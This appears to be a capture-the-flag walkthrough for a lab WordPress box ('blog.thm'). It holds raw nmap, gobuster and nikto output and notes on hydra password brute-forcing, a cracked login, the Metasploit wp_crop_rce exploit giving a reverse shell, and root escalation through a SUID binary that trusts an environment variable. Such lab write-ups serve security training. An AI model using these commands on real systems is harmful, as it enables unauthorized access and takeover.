Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-01 12:32 CEST
Nmap scan report for 10.10.138.220
Host is up (0.050s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 578ada90baed3a470c05a3f7a80a8d78 (RSA)
|   256 c264efabb19a1c87587c4bd50f204626 (ECDSA)
|_  256 5af26292118ead8a9b23822dad53bc16 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-generator: WordPress 5.0
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=5/1%OT=22%CT=1%CU=32612%PV=Y%DS=2%DC=T%G=Y%TM=644F9595
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11
OS:NW7%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(
OS:R=Y%DF=Y%T=40%W=F507%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   35.23 ms 10.9.0.1
2   35.77 ms 10.10.138.220

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.98 seconds
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.138.220
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/05/01 12:35:28 Starting gobuster in directory enumeration mode
===============================================================
/rss                  (Status: 301) [Size: 0] [--> http://10.10.138.220/feed/]
/login                (Status: 302) [Size: 0] [--> http://blog.thm/wp-login.php]
/0                    (Status: 301) [Size: 0] [--> http://10.10.138.220/0/]
/feed                 (Status: 301) [Size: 0] [--> http://10.10.138.220/feed/]
/atom                 (Status: 301) [Size: 0] [--> http://10.10.138.220/feed/atom/]
/wp-content           (Status: 301) [Size: 319] [--> http://10.10.138.220/wp-content/]
/admin                (Status: 302) [Size: 0] [--> http://blog.thm/wp-admin/]
/rss2                 (Status: 301) [Size: 0] [--> http://10.10.138.220/feed/]
/wp-includes          (Status: 301) [Size: 320] [--> http://10.10.138.220/wp-includes/]
/rdf                  (Status: 301) [Size: 0] [--> http://10.10.138.220/feed/rdf/]
/page1                (Status: 301) [Size: 0] [--> http://10.10.138.220/]
/'                    (Status: 301) [Size: 0] [--> http://10.10.138.220/]
/dashboard            (Status: 302) [Size: 0] [--> http://blog.thm/wp-admin/]

nikto -host 10.10.138.220
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.10.138.220
+ Target Hostname:    10.10.138.220
+ Target Port:        80
+ Start Time:         2023-05-01 12:51:20 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Drupal Link header found with value: <http://blog.thm/wp-json/>; rel="https://api.w.org/". See: https://www.drupal.org/
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: contains 2 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.



trying to find a valid username with the following command: 
hydra -L /usr/share/wordlists/rockyou.txt -p test 10.10.138.220 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username' -t 30 -v

might have to use a custom wordlist generated with cewl as follows: cewl -w list.txt -d 5 -m 5 http://blog.thm/

trying to get a username with that: 
hydra -L list.txt -p test 10.10.138.220 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username' -t 30 -v

tried to connect to ssh using the name: billy

trying to crack the password as follows: hydra -l billy -P /usr/share/wordlists/rockyou.txt ssh://10.10.138.220 -t 30 -v

so apparently the usernames were in the URL when clicking on the authors billy joel or karen wheeler:
bjoel and kwheel

trying to bruteforce their passwords:
hydra -l bjoel -P /usr/share/wordlists/rockyou.txt 10.10.138.220 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^:The password you entered for the username' -t 30 -v

found credentials: kwheel:cutiepie1

found an exploit for wordpress 5.0 on msfconsole: multi/http/wp_crop_rce

ran it but forgot to set lhost to the ip connected to thm network so it didn't work at first, worked after changing lhost 

we can get a normal shell by typing:	shell
					bash -i

find files with SUID bit set as follows: find / -type f -perm -u=s 2>/dev/null

there is the file /usr/sbin/checker 

apparently it can be exploited because it is getting an environment variable called admin to check whether its executed by an admin
found with the following command: ltrace /usr/sbin/checker

we can set this environment variable like so: export admin=admin
